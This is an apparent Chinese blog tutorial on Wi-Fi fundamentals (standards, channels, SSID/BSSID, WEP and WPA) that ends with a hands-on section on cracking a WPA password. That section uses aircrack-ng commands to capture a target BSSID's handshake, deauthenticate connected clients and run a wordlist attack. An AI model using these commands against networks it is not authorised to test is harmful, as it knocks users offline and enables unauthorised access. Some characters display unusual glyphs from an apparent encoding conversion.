wifi是什么?
無線協(xié)議,手機上的無線技術(shù),也叫做WIFI或是WLAN功能。WIFI全稱Wireless Fidelity,又稱802.11b標(biāo)準(zhǔn),它的最大優(yōu)點就是傳輸速度較高,可以達到11Mbps,另外它的有效距離也很長,同時也與已有的各種802.11DSSS設(shè)備兼容。Wi-Fi 無線保真技術(shù)與藍牙技術(shù)一樣,同屬于在辦公室和家庭中使用的短距離無線技術(shù)。該技術(shù)使用的是2.4GHz附近的頻段,該頻段尚屬沒用許可的無線頻段。其可使用的標(biāo)準(zhǔn)有兩個,分別是IEEE802.11a和IEEE802.11b。IEEE802.11g是802.11b的繼任者,在802.11b所使用的相同的2.4GHz頻段上提供了最高54Mbps的數(shù)據(jù)傳輸率
wlan
WLAN是Wireless Local Area Network的簡稱,指應(yīng)用無線通信技術(shù)將計算機設(shè)備互聯(lián)起來,構(gòu)成可以互相通信和實現(xiàn)資源共享的網(wǎng)絡(luò)體系。無線局域網(wǎng)本質(zhì)的特點是不再使用通信電纜將計算機與網(wǎng)絡(luò)連接起來,而是通過無線的方式連接,從而使網(wǎng)絡(luò)的構(gòu)建和終端的移動更加靈活。
它是相當(dāng)便利的數(shù)據(jù)傳輸系統(tǒng),它利用射頻(Radio Frequency;RF)的技術(shù),使用電磁波,取代舊式礙手礙腳的雙絞銅線(Coaxial)所構(gòu)成的局域網(wǎng)絡(luò),在空中進行通信連接,使得無線局域網(wǎng)絡(luò)能利用簡單的存取架構(gòu)讓用戶透過它,達到“信息隨身化、便利走天下”的理想境界。
Wifi 與 網(wǎng)線
1、通信方面的區(qū)別
無線網(wǎng)絡(luò)通信雙方因為是通過無線進行通信,所以通信之前需要建立連接;而有線網(wǎng)絡(luò)就直接用線纜連接,不用這個過程了。通信雙方通信方式是半雙工的通信方式;而有線網(wǎng)絡(luò)可以是全雙工。通信時無線網(wǎng)絡(luò)在網(wǎng)絡(luò)層以下出錯的概率非常高,所以幀的重傳概率很大;而有線網(wǎng)絡(luò)出錯概率非常小。
2、性能方面的區(qū)別
有線網(wǎng)絡(luò)提供卓越的性能。無線網(wǎng)絡(luò)連接僅提供10Mbps帶寬,相反100Mbps有線網(wǎng)絡(luò)雖然成本稍高,但很容易獲得。
3、安全方面的區(qū)別
無線網(wǎng)絡(luò)不如有線網(wǎng)絡(luò)安全。這是因為無線通信信號在空中傳播并且可以被攔截。
wifi頻譜劃分
2.4GHz的wifi,有14個頻譜,其中1 6 11 互不干擾。什么意思?比如一套房里,有客廳,主臥,次臥,分別裝了三個路由器,三個電磁波都會受到干擾,上網(wǎng)卡,此時分別設(shè)置無線信道為1 6 11,在使用就不會產(chǎn)生卡頓了。
SSID&BSSID
1)基本服務(wù)集(BSS)
基本服務(wù)集是802.11 LAN的基本組成模塊。能互相進行無線通信的STA可以組成一個BSS(Basic Service Set) 。如果一個站移出BSS的覆蓋范圍,它將不能再與BSS的其它成員通信。
2)擴展服務(wù)集(ESS)
多個BSS可以構(gòu)成一個擴展網(wǎng)絡(luò),稱為擴展服務(wù)集(ESS)網(wǎng)絡(luò),一個ESS網(wǎng)絡(luò)內(nèi)部的STA可以互相通信,是采用相同的SSID的多個BSS形成的更大規(guī)模的虛擬BSS。連接BSS的組件稱為分布式系統(tǒng)(Distribution System,DS)。
SSID是服務(wù)集的標(biāo)識,在同一SS內(nèi)的所有STA和AP必須具有相同的SSID,否則無法進行通信。
SSID是一個ESS的網(wǎng)絡(luò)標(biāo)識(路由器的名稱,可自己設(shè)置)
BSSID是AP的MAC地址,用來標(biāo)識AP管理的BSS(路由器的mac地址,無法更改)
無線接入過程三個階段
STA(工作站)啟動初始化、開始正式使用AP傳送數(shù)據(jù)幀前,要經(jīng)過三個階段才能夠接入(802.11MAC層負(fù)責(zé)客戶端與AP之間的通訊,功能包括掃描、接入、認(rèn)證、加密、漫游和同步等功能):
1)掃描階段(SCAN)
2)認(rèn)證階段 (Authentication)
3)關(guān)聯(lián)(Association)
認(rèn)證連接方式
無認(rèn)證(免費wifi)
有認(rèn)證
ssid-密碼認(rèn)證
wep
wpa/wpa2
wps
wep
WEP是Wired Equivalent Privacy的簡稱,有線等效保密(WEP)協(xié)議是對在兩臺設(shè)備間無線傳輸?shù)臄?shù)據(jù)進行加密的方式,用以防止非法用戶竊聽或侵入無線網(wǎng)絡(luò)。不過密碼分析學(xué)家已經(jīng)找出 WEP 好幾個弱點,因此在2003年被 Wi-Fi Protected Access (WPA) 淘汰,又在2004年由完整的 IEEE 802.11i 標(biāo)準(zhǔn)(又稱為 WPA2)所取代。WEP 雖然有些弱點,但也足以嚇阻非專業(yè)人士的窺探了。
wpa/wpa2
WPA全名為Wi-Fi Protected Access,有WPA、WPA2和WPA3三個標(biāo)準(zhǔn),是一種保護無線電腦網(wǎng)絡(luò)(Wi-Fi)安全的系統(tǒng),它是應(yīng)研究者在前一代的系統(tǒng)有線等效加密(WEP)中找到的幾個嚴(yán)重的弱點而產(chǎn)生的。WPA實作了IEEE 802.11i標(biāo)準(zhǔn)的大部分,是在802.11i完備之前替代WEP的過渡方案。WPA的設(shè)計可以用在所有的無線網(wǎng)卡上,但未必能用在第一代的無線取用點上。WPA2具備完整的標(biāo)準(zhǔn)體系,但其不能被應(yīng)用在某些老舊型號的網(wǎng)卡上。
wpa握手流程
實戰(zhàn)演練爆破wifi密碼
需購買無線網(wǎng)卡免驅(qū)usb
1 iwconfig 查看無線網(wǎng)卡狀態(tài)
1 airmon-ng check kill 關(guān)閉占有網(wǎng)卡的進程
激活網(wǎng)卡,需記住下面的網(wǎng)卡名字
1 airmon-ng start wlxxxxx
查看當(dāng)前有哪些WIFI
1 airodump-ng wlan0mon
針對某個wifi流量抓取
1 airodump-ng -c 11 --bssid 30:D3:86:E2:40:D0 -w 207 wlan0mon
2
3 c: 指定它的信道
4 bssid: mac地址
5 w: 任意文件名稱,用來保存流量
選擇一個連接的wifi,進行流量攻擊
1 aireplay-ng -0 40 -a 30:D3:86:E2:40:D0 wlan0mon
2 0: 發(fā)送攻擊次數(shù)
3 a: mac地址
爆破cap流量中的密碼
1 aircrack-ng -w pass.txt 207-01.cap
來源:軒公子談技術(shù)